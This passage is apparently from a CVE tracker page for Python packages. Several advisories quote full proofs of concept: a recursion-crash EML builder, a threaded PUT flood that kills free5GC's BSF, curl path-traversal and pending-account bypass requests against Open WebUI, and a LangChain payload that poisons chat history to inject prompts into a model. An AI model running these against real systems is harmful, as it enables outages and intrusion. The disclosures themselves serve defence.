Skip to main content

Python

2165 CVEs product

Monthly

CVE-2026-44972 PyPI MEDIUM GHSA This Month

GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).

Python Code Injection
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-7820 PyPI MEDIUM PATCH This Month

pgAdmin 4 before version 9.15 allows unauthenticated attackers to bypass account lockout and perform unbounded password-guessing attacks against INTERNAL authentication accounts by exploiting Flask-Security's default /login endpoint, which does not enforce the locked column that the custom /authenticate/login view relies on for brute-force protection. The vulnerability affects only accounts using pgAdmin's INTERNAL authentication source; LDAP, OAuth2, Kerberos, and Webserver authentication methods are not vulnerable because they do not use local passwords.

Authentication Bypass Python
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-7818 PyPI HIGH PATCH GHSA This Week

Unsafe Python pickle deserialization in pgAdmin 4 FileBackedSessionManager allows authenticated local users with session-directory write access to execute arbitrary code as the pgAdmin process. The vulnerability arises from deserializing session files before validating their HMAC signature, enabling payload injection through crafted pickle objects. Attackers require both valid authentication and filesystem write permission to the sessions directory-achievable through misconfiguration or chaining with a separate path-traversal vulnerability. EPSS exploitation probability and KEV status not provided; no public exploit code identified at time of analysis. PostgreSQL maintainers confirmed the flaw and patched it in version 9.15 by implementing pre-deserialization HMAC validation.

Python RCE Deserialization
NVD GitHub VulDB
CVSS 4.0
7.3
EPSS
0.3%
CVE-2026-44346 PyPI HIGH PATCH GHSA This Week

Command injection in BentoML 1.4.38 and earlier allows attackers to execute arbitrary code on build hosts when victims containerize malicious bentos. Exploitation occurs during the `bentoml containerize` workflow when unvalidated `envs[*].name` and `docker.base_image` fields from imported bentofile.yaml are interpolated into generated Dockerfiles without escaping, enabling newline-injection of RUN directives executed by `docker build`. This is a sibling vulnerability to CVE-2026-33744 and CVE-2026-35043 which patched the same injection class in `system_packages` fields but left these additional attack surfaces unaddressed. Patch version 1.4.39 available from vendor. No CISA KEV listing or public POC outside gated HuggingFace repository at time of analysis, but end-to-end reproduction confirmed by reporter on BentoML 1.4.38.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44345 PyPI HIGH PATCH GHSA This Week

Command injection in BentoML allows arbitrary code execution on developer workstations during containerization of untrusted bento packages. Attackers craft malicious bento.yaml files with newline-injected docker.base_image values that smuggle Dockerfile RUN directives into the generated Dockerfile template. When victims run 'bentoml containerize' on the malicious bento, Docker build executes the injected commands on the host system with full developer privileges. This vulnerability (GHSA-78f9-r8mh-4xm2) is part of a documented cluster alongside GHSA-w2pm-x38x-jp44, CVE-2026-33744, and CVE-2026-35043, all involving unsafe Jinja2 template interpolation in BentoML's Dockerfile generation pipeline. Fixed in version 1.4.39. No active exploitation confirmed at time of analysis; EPSS data not available for 2026-dated CVE.

Python Docker Command Injection
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-44985 Go HIGH GHSA This Week

Cross-Site WebSocket Hijacking (CSWSH) in Dozzle's /exec and /attach endpoints allows authenticated shell access bypass when --enable-shell is enabled. The vulnerability stems from WebSocket origin validation bypass (CheckOrigin returns true) combined with SameSite=Lax JWT cookies, enabling attackers on same-site origins (sibling subdomains or localhost services) to hijack victim WebSocket sessions and execute arbitrary commands in Docker containers. Affects all Dozzle deployments through version 10.5.1 with shell access enabled. No public exploit identified at time of analysis, but detailed proof-of-concept exists in the GitHub advisory demonstrating container shell access via Python script. CVSS score not assigned, but CWE-346 classification indicates origin validation failure.

Python Docker RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-44565 PyPI HIGH PATCH GHSA This Week

Path traversal in Open WebUI's file upload mechanism allows authenticated attackers to write and subsequently delete arbitrary files on the server filesystem. Discovered by Taylor Pennington of KoreLogic, this vulnerability affects the /ollama/models/upload API endpoint where unsanitized filename parameters enable directory traversal using dot-segments. The vulnerability requires low-privilege authentication (PR:L) and has straightforward exploitation (AC:L), confirmed by a published GitHub security advisory (GHSA-j3fw-wc48-29g3) with working proof-of-concept code. Vendor-released patch available in version 0.6.10. No evidence of active exploitation (not in CISA KEV) at time of analysis.

Python Path Traversal Debian
NVD GitHub
CVSS 3.1
8.1
EPSS
0.1%
CVE-2026-42595 Go HIGH PATCH GHSA This Week

Server-side request forgery in Gotenberg's Chromium URL-to-PDF endpoint allows unauthenticated remote attackers to exfiltrate cloud credentials and access internal services. The primary `/forms/chromium/convert/url` endpoint ships with no default deny-list for HTTP/HTTPS targets - only blocking file:// URIs - enabling direct access to AWS/GCP/Azure metadata endpoints at 169.254.169.254, RFC 1918 private networks, and localhost services. Even when administrators configure custom deny-lists, attackers bypass validation via HTTP 302 redirects, as Chromium follows redirects without re-validating destinations. Vendor-confirmed public exploit code exists (PoC in GHSA-chwh-f6gm-r836). Patch available in version 8.32.0.

SSRF Microsoft Python Docker Google
NVD GitHub
CVSS 3.1
8.6
EPSS
0.1%
CVE-2026-31252 MEDIUM This Month

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its model loading component. The framework uses torch.load() to load model weight files (e.g., llm.pt, flow.pt, hift.pt) without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a malicious model directory containing specially crafted model files. When a victim starts the CosyVoice Web UI pointing to this directory, arbitrary code is executed on the victim's system during the model loading process.

Python Code Injection Deserialization RCE N A
NVD GitHub
CVSS 3.1
5.7
EPSS
0.0%
CVE-2026-31254 HIGH This Week

The flash-attention project thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains a code injection vulnerability (CWE-94) in its training script. The script registers the Python eval() function as a Hydra configuration resolver under the name eval. This allows configuration files to execute arbitrary Python code via the ${eval:...} syntax. An attacker can exploit this by providing a malicious configuration file, leading to arbitrary code execution when the training script is run with that configuration.

Python Code Injection RCE N A
NVD
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-31251 HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its gRPC server component. When the server starts, it loads the speech synthesis model from a user-specified directory using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious model files within a directory. When a victim starts the gRPC server pointing to this directory, arbitrary code is executed on the victim's system during server initialization.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-31250 HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its average_model.py model averaging tool. The script loads PyTorch checkpoint files (epoch_*.pt) for model averaging using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious checkpoint files within a directory. When a victim uses the tool to average models from this directory, arbitrary code is executed on the victim's system.

Checkpoint Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-31253 PyPI HIGH GHSA This Week

The flash-attention training framework thru commit e724e2588cbe754beb97cf7c011b5e7e34119e62 (2025-13-04) contains an insecure deserialization vulnerability (CWE-502) in its checkpoint loading mechanism. The load_checkpoint() function in checkpoint.py and the checkpoint loading code in eval.py use torch.load() without enabling the security-restrictive weights_only=True parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing a maliciously crafted checkpoint file. When a victim loads this checkpoint during model warmstarting or evaluation, arbitrary code is executed on the victim's system.

Checkpoint Deserialization Python RCE Code Injection +1
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-31249 HIGH This Week

CosyVoice thru commit 6e01309e01bc93bbeb83bdd996b1182a81aaf11e (2025-30-21) contains an insecure deserialization vulnerability (CWE-502) in its make_parquet_list.py data processing tool. The script loads PyTorch .pt files (utterance embeddings, speaker embeddings, speech tokens) using torch.load() without enabling the weights_only=True security parameter. This allows the deserialization of arbitrary Python objects via the pickle module. An attacker can exploit this by providing malicious .pt files within a data directory. When a victim processes this directory using the tool, arbitrary code is executed on the victim's system.

Python RCE Deserialization N A
NVD GitHub
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44897 PyPI MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) in mistune's HTMLRenderer.heading() allows injection of arbitrary HTML attributes when custom heading_id callbacks return unsanitized heading text. The vulnerability occurs because the id attribute value is concatenated directly into the HTML tag without escaping, enabling attackers who control heading content to break out of the id= attribute and inject event handlers or other malicious attributes. Exploitation requires a caller-supplied heading_id callback that derives IDs from heading text - the most common real-world pattern used by documentation generators like MkDocs, Sphinx, and Jekyll. Publicly available proof-of-concept demonstrates mouse-over triggered JavaScript execution via onmouseover attribute injection.

XSS Apple Python Red Hat
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44708 PyPI MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) vulnerability in the Mistune markdown parser's math plugin bypasses the `escape=True` security setting by rendering inline (`$...$`) and block (`$$...$$`) math content without HTML escaping. Attackers can inject arbitrary JavaScript that executes in the victim's browser session when a developer-controlled application parses untrusted markdown with the math plugin enabled, even when the parser is explicitly configured to sanitize all user input. Proof-of-concept code demonstrates script tag injection and image onerror handler exploitation; no public exploit code identified at time of analysis.

XSS Apple Python Red Hat
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44844 PyPI MEDIUM PATCH GHSA This Month

### Summary `EmlParser.get_raw_body_text()` recurses unconditionally for every nested `message/rfc822` attachment without any depth limit. An attacker who can supply a badly crafted EML file with approximately 120 nested `message/rfc822` parts triggers an unhandled `RecursionError` and aborts parsing of the message. A 12 KB EML file is enough to crash a worker. Though this causes the parser to crash, it is an unlikely scenario as the suggested EML that crashes the parser would not pass basic RFC compliance tests. ### Details The vulnerable function is `EmlParser.get_raw_body_text()` in `eml_parser/parser.py`. For every part of type `multipart/*`, the function iterates over its sub-parts; for every sub-part of type `message/rfc822`, it calls itself recursively on the inner message: There is no depth parameter and no early-abort. CPython's default `sys.recursionlimit` is 1000. Each level of `message/rfc822` nesting adds approximately 8 frames to the stack (parser code + stdlib `_header_value_parser` calls), so roughly 120 nested levels exhaust the limit. The `RecursionError` is not caught anywhere along the call chain, so it propagates out of `decode_email_bytes()` and aborts processing of the entire message. ### PoC Environment: Python 3.12.3, eml_parser 3.0.0 (`pip install eml_parser==3.0.0`), default `sys.recursionlimit=1000`, Ubuntu 24.04 aarch64. No special configuration of `EmlParser`, default constructor. Self-contained reproducer that builds the PoC and triggers the crash: ```python import eml_parser def build_poc(depth=124): inner = b"From: a@a\r\nTo: b@b\r\nContent-Type: text/plain\r\n\r\n.\r\n" msg = inner for i in range(depth): b = f"B{i}".encode() msg = ( b'Content-Type: multipart/mixed; boundary="' + b + b'"\r\n\r\n' b'--' + b + b'\r\nContent-Type: message/rfc822\r\n\r\n' ) + msg + b'\r\n--' + b + b'--\r\n' return msg ep = eml_parser.EmlParser() ep.decode_email_bytes(build_poc()) # RecursionError after ~76 ms on Apple Silicon (Ubuntu 24.04 aarch64). ``` Note that the suggested code does not produce an RFC compliant message. Resulting EML payload size: 12,369 bytes. SHA-256 of generated PoC: `00f15f635e21b4144967c2893b37425e6a6bd7b4185c557e5c7e904e1e6d18e8` The crash is deterministic on a stock install. No network, no special headers, no large attachments. ### Impact Denial of service of any pipeline that processes attacker-supplied EML files using `eml_parser`. A single 12 KB email is enough to crash a worker. If the worker is a long-running process triaging multiple emails, the unhandled exception aborts processing of the whole batch unless the caller wraps the call in a broad `try/except`. Even then, attacker-supplied volume can keep workers in a perpetual restart loop. The vulnerability is exploitable pre-authentication in any deployment that ingests emails from external senders which have not been subject to any kind of basic validation. Considering that email messages pass through a mail-server which does some kind of validation, messages as produced by the *build_poc* function would not reach eml_parser. Nonetheless recursion depth checks have been implemented to handle the described issue. ### Reporter Sebastián Alba Vives (`@Sebasteuo`) Independent security researcher, Senior AppSec Consultant LinkedIn: https://www.linkedin.com/in/sebastian-alba Email: sebasjosue84@gmail.com PGP: `0D1A E4C2 CFC8 894F 19EA DA24 45CD CA33 2CF8 31F4`

Python Denial Of Service Apple Ubuntu
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-44843 PyPI HIGH PATCH NEWS GHSA This Week

LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects="all"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate classes with untrusted constructor arguments. Applications are exposed only when all of the following are true: 1. The application accepts untrusted structured input, such as JSON, from a user or network request. 2. The application does not validate or canonicalize that input into an inert schema before invoking LangChain. 3. Attacker-controlled nested dictionaries or lists are preserved in LangChain run inputs or outputs. 4. The application uses an affected API path that later deserializes that run data. Known affected runtime surfaces include: - `RunnableWithMessageHistory` - `astream_log()` - `astream_events(version="v1")` Related unsafe deserialization patterns may also affect applications that explicitly load serialized LangChain prompt or runnable objects from untrusted sources, including shared prompt stores, Hub artifacts with model configuration, or other application-controlled serialization stores. Applications that validate incoming requests against a fixed schema, such as coercing user input to a plain string or message-content field before invoking LangChain, are unlikely to expose this deserialization primitive. This release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic. ## Impact An attacker who can submit untrusted structured input to an affected application, and have that structure preserved in LangChain run data, may be able to inject LangChain serialized constructor payloads such as: ```json { "lc": 1, "type": "constructor", "id": ["langchain_core", "messages", "ai", "AIMessage"], "kwargs": {"content": "attacker-controlled content"} } ``` If this payload reaches a broad `load()` call, LangChain may instantiate the referenced class instead of treating the payload as inert user data. Realistic impacts include: - Persistent chat-history poisoning when revived `AIMessage`, `HumanMessage`, or `SystemMessage` objects are stored by `RunnableWithMessageHistory`. - Prompt injection or behavior manipulation if attacker-controlled messages are later included in model context. - Instantiation of unexpected trusted LangChain objects with attacker-controlled constructor arguments. - Possible credential disclosure or server-side requests if a reachable object reads environment credentials, creates clients, or contacts attacker-controlled endpoints during initialization. - Additional prompt-template or runnable-configuration impacts in applications that separately load and execute untrusted serialized LangChain objects. ## Remediation LangChain will deprecate the affected APIs as part of this fix: - `RunnableWithMessageHistory` - `astream_log()` - `astream_events(version="v1")` These are older code paths that are no longer recommended for new applications. They were not previously marked as deprecated, but recent LangChain documentation has primarily directed users toward newer streaming and memory patterns, including the `stream` API. Applications should migrate to the currently recommended APIs rather than continue depending on these older surfaces. Separately, LangChain will update `load()` and `loads()` to tighten deserialization behavior so broad object revival is not applied implicitly to untrusted or application-controlled payloads. The older runtime surfaces listed above are being deprecated rather than preserved as supported paths for broad runtime deserialization. This release also fixes a related secret-marker validation bypass in the serialization and deserialization layer (`_is_lc_secret`). That issue creates an additional path by which attacker-controlled constructor dictionaries can avoid escaping during `dumps()` -> `loads()` round-trips and reach LangChain object revival logic. ## Guidance for `load()` and `loads()` `load()` and `loads()` should be used only with trusted LangChain manifests or serialized objects from trusted storage. Do not pass user-controlled data to `load()` or `loads()`, and do not use them as general parsers for request bodies, tool inputs, chat messages, or other attacker-controlled data. `load()` and `loads()` are beta APIs, and their behavior may change as LangChain narrows unsafe defaults. Future LangChain versions will require callers to be explicit about which objects may be revived. Users should pass a narrow `allowed_objects` value appropriate for the specific trusted manifest they are loading, rather than relying on broad defaults or `allowed_objects="all"`, which permits the full trusted LangChain serialization allowlist. ## Credits The original issue was first reported by @u-ktdi. Similar findings were reported by @dewankpant, @shrutilohani, @Moaaz-0x, @pucagit. A related `_is_lc_secret` marker bypass affecting `dumps()` -> `loads()` round-trips was reported by @yardenporat353 (and a similar report by @localhost-detect)

Python Deserialization
NVD GitHub
CVSS 3.1
8.2
EPSS
0.0%
CVE-2026-44318 Go MEDIUM PATCH GHSA This Month

### Summary free5GC's BSF `PUT /nbsf-management/v1/subscriptions/{subId}` handler has an unsynchronized write on the global `Subscriptions` map. The handler first reads the map under `RLock()` via `BSFContext.GetSubscription(subId)`, but if the subscription does not exist, `ReplaceIndividualSubcription()` writes back to the same map directly without taking the mutex (`bsfContext.BsfSelf.Subscriptions[subId] = subscription`). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with `fatal error: concurrent map read and map write` (Go runtime panics that come from concurrent map access bypass `recover()` and terminate the process). The BSF container exits with code `2` -- the entire BSF SBI surface goes down until restart. This endpoint requires a valid `nbsf-management` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS. ### Details Validated against the BSF container in the official Docker compose lab. - Source repo tag: `v4.2.1` - Running Docker image: `free5gc/bsf:v4.2.1` - Docker validation date: 2026-03-22 - BSF endpoint: `http://10.100.200.11:8000` Read side (locked): ```go func (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) { c.mutex.RLock() defer c.mutex.RUnlock() sub, exists := c.Subscriptions[subId] return sub, exists } ``` Unsafe write side in the create-if-absent branch of `ReplaceIndividualSubcription` (no `Lock()`): ```go subscription.SubId = subId bsfContext.BsfSelf.Subscriptions[subId] = subscription ``` Under concurrent traffic, the Go runtime detects the unsynchronized read/write on `c.Subscriptions` and aborts the process. Go's `concurrent map read and map write` fatal is NOT a normal panic -- it is unrecoverable, Gin's recovery middleware does not catch it, and the BSF process terminates. Code evidence (paths in `free5gc/bsf`): - Read side (locked): - `NFs/bsf/internal/sbi/processor/subscriptions.go:81` - `NFs/bsf/internal/context/context.go:726` - `NFs/bsf/internal/context/context.go:730` - Unsafe write side (the create-if-absent branch in PUT, no lock): - `NFs/bsf/internal/sbi/processor/subscriptions.go:111` - `NFs/bsf/internal/sbi/processor/subscriptions.go:114` The normal locked helpers (`CreateSubscription()`, `GetSubscription()`, `UpdateSubscription()`, `DeleteSubscription()`) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch. ### PoC Reproduced end-to-end against the running BSF at `http://10.100.200.11:8000`. 1. Obtain a valid `nbsf-management` token from NRF: ``` curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \ -H 'Content-Type: application/x-www-form-urlencoded' \ --data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=BSF&scope=nbsf-management' ``` 2. Send concurrent PUT requests against fresh `subId` values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs): ```python import json, threading, urllib.request TOKEN = "<valid_nbsf_management_jwt>" BASE = "http://10.100.200.11:8000/nbsf-management/v1" PAYLOAD = json.dumps({ "events": ["PCF_BINDING_CREATION"], "notifUri": "http://127.0.0.1/cb", "notifCorreId": "1", "supi": "imsi-208930000000003", }).encode() def send_put(i, n): url = f"{BASE}/subscriptions/race-mix-{i}-{n}" req = urllib.request.Request(url, data=PAYLOAD, method="PUT") req.add_header("Authorization", f"Bearer {TOKEN}") req.add_header("Content-Type", "application/json") urllib.request.urlopen(req, timeout=2).read() threads = [] for i in range(64): for n in range(50): threads.append(threading.Thread(target=send_put, args=(i, n))) for t in threads: t.start() for t in threads: t.join() ``` 3. BSF container logs (`docker logs bsf`) show the Go runtime fatal that terminated the process: ``` [INFO][BSF][Proc] Handle ReplaceIndividualSubcription fatal error: concurrent map read and map write github.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300) github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f ``` 4. Container state confirms exit code 2: ``` exited|2|0 ``` ### Impact Unsynchronized concurrent access (CWE-362) to a shared map (`BsfSelf.Subscriptions`), combined with missing synchronization on the create-if-absent branch (CWE-820). Go's runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin's `recover()` middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF's `nbsf-management` SBI surface (PCF binding lookups for SMF, AF -> PCF binding discovery, etc.) until restart. Any party that holds (or can obtain) a valid `nbsf-management` token can: - Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh `subId` values, deterministically tripping the runtime fatal and killing the BSF process. - Repeat the trigger after every restart to sustain the outage. No Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint. Affected: free5gc v4.2.1. Upstream issue: https://github.com/free5gc/free5gc/issues/926 Upstream fix: https://github.com/free5gc/bsf/pull/7

Denial Of Service Python Docker Race Condition
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-44566 PyPI HIGH PATCH GHSA This Week

# **CONFIDENTIAL** # KL-CAN-2024-002 ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Jaggar Henry & Sean Segreti of KoreLogic, Inc. | | 2 | **Date Submitted** | 2024.03.12 | | 3 | **Title** | Open WebUI Arbitrary File Upload + Path Traversal | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-434: Unrestricted Upload of File with Dangerous Type | --- ## 4. High-level Summary Attacker controlled files can be uploaded to arbitrary locations on the web server's filesystem by abusing a path traversal vulnerability. --- ## 11. Technical Analysis When attaching files to a prompt by clicking the plus sign (+) on the left of the message input box when using the Open WebUI HTTP interface, the file is uploaded to a static upload directory. The name of the file is derived from the original HTTP upload request and is not validated or sanitized. This allows for users to upload files with names containing dot-segments in the file path and traverse out of the intended uploads directory. Effectively, users can upload files anywhere on the filesystem the user running the web server has permission. This can be visualized by examining the python code for the `/rag/api/v1/doc` API route: ```python @app.post("/doc") def store_doc( collection_name: Optional[str] = Form(None), file: UploadFile = File(...), user=Depends(get_current_user), ): # "https://www.gutenberg.org/files/1727/1727-h/1727-h.htm" print(file.content_type) try: filename = file.filename file_path = f"{UPLOAD_DIR}/{filename}" contents = file.file.read() with open(file_path, "wb") as f: f.write(contents) f.close() ``` The `file` variable is a representation of the multipart form data contained within the HTTP POST request. The `filename` variable is derived from the uploaded file name and is not validated before writing the file contents to disk. This can be used to upload malicious models. These models are often distributed as pickled python objects and can be leveraged to execute arbitrary python bytecode once deserialized. Alternatively, an attacker can leverage existing services, such as SSH, to upload an attacker controlled `authorized_keys` file to remotely connect to the machine. --- ## 12. Proof-of-Concept Execute the following cURL command: ```bash TARGET_URI='https://redacted.com'; JWT='redacted'; LOCAL_FILE='/tmp/file_to_upload.txt'\ curl -H "Authorization: Bearer $JWT" -F "file=$LOCAL_FILE;filename=../../../../../../../../../../tmp/pwned.txt" "$TARGET_URI/rag/api/v1/doc" ``` Verify the file `pwned.txt` exists in the `/tmp/` directory on the machine hosting the web server: ```console ollama@webserver:~$ cat /tmp/pwned.txt korelogic ollama@webserver:~$ ```

Python File Upload Path Traversal Debian
NVD GitHub VulDB
CVSS 3.1
7.3
EPSS
0.1%
CVE-2026-44567 PyPI HIGH PATCH GHSA This Week

# **CONFIDENTIAL** # Vulnerability Disclosure Analysis Documentation --- ## Vulnerability Details | # | Field | Value | |---|-------|-------| | 1 | **Discoverer** | Taylor Pennington of KoreLogic, Inc. | | 2 | **Date Submitted** | June 11, 2024 | | 3 | **Title** | Open WebUI Improper Authorization Control | | 5 | **Affected Vendor** | Open WebUI | | 6 | **Affected Product(s)** | Open WebUI (Formerly Ollama WebUI) | | 7 | **Affected Version(s)** | 0.1.105 | | 8 | **Platform/OS** | Debian GNU/Linux 12 (bookworm) | | 9 | **Vector** | HTTP web interface | | 10 | **CWE** | 285 Improper Authorization | --- ## 4. High-level Summary There is a missing authorization check affecting user accounts with a `pending` status allowing the user to make authenticated API calls as a `user` context. --- ## 11. Technical Analysis The Open WebUI web application has three user role classifications: `user`, `admin`, and `pending`. By default, when Open WebUI is configured with `new sign-ups` enabled, the default user role is set to `pending`. In this configuration, an administrator is required to go into the Admin management panel following a new user registration and reconfigure the user to have a role of either `user` or `admin` before that user is able to access the web application. However, this check is only enforced at the client presentation layer, the API does not properly validate that the user has an authorized user role of `user`. ### Request ```http POST /api/v1/auths/signup HTTP/1.1 Host: openwebui.example.com Content-Length: 60 { "name": "", "email": "bad_guy@korelogic.com", "password": "a" } ``` ### Response ```http HTTP/1.1 200 OK ... { "id": "f839557a-031a-47a5-9999-0b0998f8f959", "email": "bad_guy@korelogic.com", "name": "", "role": "pending", "profile_image_url": "/user.png", "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs", "token_type": "Bearer" } ``` An attacker can then use the JWT in the above response to make direct API calls or they can forge the authentication response and use the web UI. With the JWT, an attacker can now query the LLM. However, for this demonstration we will query the `/ollama/api/tags` endpoint and get a list of available models as this is an authenticated endpoint. Attempting to make this request without a valid JWT returns an HTTP `401 Unauthorized` response. ### Request ```http GET /ollama/api/tags HTTP/1.1 Host: openwebui.example.com Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImY4Mzk1NTdhLTAzMWEtNDdhNS05OTk5LTBiMDk5OGY4Zjk1OSJ9.Bk-S4ABXb1tRuiVNfOJYbQFB8ewixWA4a1FohvIZARs ``` ### Response ```http HTTP/1.1 200 OK ... { "models": [ { "name": "ollama.com/emsi/mixtral-8x22b:latest", "model": "ollama.com/emsi/mixtral-8x22b:latest", "modified_at": "2024-04-12T17:27:51.479356401-04:00", "size": 79509285991, "digest": "9b000033acd802656a652c7df4e25300a61d903cd3c8eb065a50aaace484c319", "details": { "parent_model": "", "format": "gguf", "family": "llama", "families": ["llama"], "parameter_size": "141B", "quantization_level": "Q4_0" }, "urls": [0] }, ... ] } ``` The logic for this endpoint can be seen here: <https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/apps/ollama/main.py#L163-L180> As shown below, the login checks if `url_idx` is `None` and if so, call `get_all_mdoels` and assign the result to `models` after that the logic checks if `app.state.MODEL_FILTER_ENABLED` is true and if not, it returns the result. As `MODEL_FILTER_ENABLED` is not configured by default, the application will not attempt to further validate the user. ```python @app.get("/api/tags") @app.get("/api/tags/{url_idx}") async def get_ollama_tags( url_idx: Optional[int] = None, user=Depends(get_current_user) ): if url_idx == None: models = await get_all_models() if app.state.MODEL_FILTER_ENABLED: if user.role == "user": models["models"] = list( filter( lambda model: model["name"] in app.state.MODEL_FILTER_LIST, models["models"], ) ) return models return models ``` This is just an example of one API endpoint but all other regular user accessible endpoints were accessible to a pending user. The vulnerability is caused by a missing authorization check that occurs with `user=Depends(get_current_user)`. The logic of that function is found here: <https://github.com/open-webui/open-webui/blob/0399a69b73de9789c4221acedea70d528e1346c4/backend/utils/utils.py#L77-L97> ```python def get_current_user( auth_token: HTTPAuthorizationCredentials = Depends(bearer_security), ): # auth by api key if auth_token.credentials.startswith("sk-"): return get_current_user_by_api_key(auth_token.credentials) # auth by jwt token data = decode_token(auth_token.credentials) if data != None and "id" in data: user = Users.get_user_by_id(data["id"]) if user is None: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.INVALID_TOKEN, ) return user else: raise HTTPException( status_code=status.HTTP_401_UNAUTHORIZED, detail=ERROR_MESSAGES.UNAUTHORIZED, ) ``` As shown above, this logic does not verify the role of the user, the function simples checks if the JWT is valid. --- ## 12. Proof-of-Concept First, verify that an unauthenticated user receives `{"detail":"401 Unauthorized"}`: ```bash curl -s -X $'GET' \ -H $'Host: openwebui.example.com' \ -H $'Content-Type: application/json' \ $'https://openwebui.example.com/ollama/api/tags' ``` The above curl command will return: `{"detail":"401 Unauthorized"}` as no Authorization Bearer token is provided. Now to access the authentication endpoint, two calls will be made. The first cURL creates an account and sets the `$JWT` environment variable which will be utilized in the subsequent cURL command. ```bash export JWT=$(curl -s -X POST \ -H 'Host: openwebui.example.com' -H 'Content-Length: 60' \ -H 'Content-Type: application/json' \ --data '{"name":"","email":"bad_guy@korelogic.com","password":"a"}' \ 'https://openwebui.example.com/api/v1/auths/signup' | jq '.token'|tr -d '"') curl -v $'GET' \ -H $'Host: openwebui.example.com' \ -H $'Content-Type: application/json' \ -H $'Authorization: Bearer ${JWT}' -H $'Content-Length: 2' \ --data-binary $'\x0d\x0a' \ $'https://openwebui.example.com/ollama/api/tags' ``` Additionally the `"role":"pending"` value in the HTTP response can be forged from `POST /api/v1/auths/signin` and `GET /api/v1/auths/` to utilize the full website. This can be achieved with a man-in-the-middle proxy such as Burp or Zap and modifying `pending` to `user`. --- ## 13. Mitigation Recommendation The application currently has a function for checking if the user is authorized. However, it is not being utilized except for one endpoint. See 